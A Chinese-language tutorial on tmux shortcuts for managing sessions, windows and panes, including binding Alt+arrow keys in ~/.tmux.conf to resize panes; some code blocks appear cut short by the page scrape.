操作:在当前会话中创建一个新的窗口。这对于同时处理多个任务非常有用。
+切换到下一个窗口:Ctrl + B 然后按 N
切换到上一个窗口:Ctrl + B 然后按 P
直接切换到指定编号的窗口:Ctrl + B 然后按窗口编号键(如 0、1、2 等)
操作:这些快捷键允许你在不同的窗口之间快速切换,无需使用鼠标或记忆复杂的命令。
+快捷键:Ctrl + B 然后按 W
操作:弹出窗口列表,使用箭头键选择并按 Enter 键进行切换。这对于管理大量窗口时尤为方便。
水平分割(上下分割):Ctrl + B 然后按 "(双引号)
垂直分割(左右分割):Ctrl + B 然后按 %
操作:将当前窗格分割为上下或左右两个子窗格,实现多任务并行处理。
+快捷键:Ctrl + B 然后使用方向键(←、→、↑、↓)
操作:在不同的窗格之间移动焦点,快速切换工作区域。
+为了更灵活地调整窗格大小,可以将 Alt + 方向键 设为快捷键。以下是具体配置步骤:
~/.tmux.conf 文件使用 Vim 打开或创建 ~/.tmux.conf 文件:
1 | vim ~/.tmux.conf |
在文件中添加以下内容,将 Alt + 方向键 绑定为调整窗格大小的快捷键:
1 | # 使用 Alt + 方向键调整窗格大小 |
说明:
+bind -n:表示无需前缀键(即直接按下组合键)。
M-Left、M-Right、M-Up、M-Down:分别对应 Alt + 左箭头、Alt + 右箭头、Alt + 上箭头 和 Alt + 下箭头。
resize-pane -L 5:向左调整窗格宽度 5 个单位。
resize-pane -R 5:向右调整窗格宽度 5 个单位。
resize-pane -U 5:向上调整窗格高度 5 个单位。
resize-pane -D 5:向下调整窗格高度 5 个单位。
在 Vim 中,按下 Esc 键,然后输入 :wq 并按 Enter 保存并退出。
tmux 配置在当前 tmux 会话中,按下前缀键 Ctrl + B,然后按 : 键进入命令模式,输入以下命令并按 Enter:
1 | source-file ~/.tmux.conf |
或者,在终端中运行:
+1 | tmux source-file ~/.tmux.conf |
现在,你可以使用以下快捷键来调整窗格大小:
+Alt + 左箭头Alt + 右箭头Alt + 上箭头Alt + 下箭头以下是一个简化的 ~/.tmux.conf 示例,仅包含使用 Alt + 方向键 调整窗格大小的配置:
1 | # 启用鼠标支持,开启后可以通过鼠标选择窗格并调整大小。 |
保存后,重新加载配置文件:
+1 | tmux source-file ~/.tmux.conf |
Ctrl + B 然后按 CCtrl + B 然后按 NCtrl + B 然后按 PCtrl + B 然后按 WCtrl + B 然后按 "(双引号)Ctrl + B 然后按 %Ctrl + B 然后使用方向键(←、→、↑、↓)Alt + 左箭头Alt + 右箭头Alt + 上箭头Alt + 下箭头1 | tmux new -s 会话名 |
1 | tmux kill-session -t 会话名 |
1 | tmux attach -t 会话名 |
1 | tmux ls |
通过掌握上述快捷键配置,你可以在 tmux 中高效地管理会话、窗口和窗格,并使用 Alt + 方向键 快速调整窗格大小。这将大大提升你的终端操作效率,特别是在同时处理多个任务和使用 Vim 进行编辑时。
Mail: lovehamethyst@gmail.com
+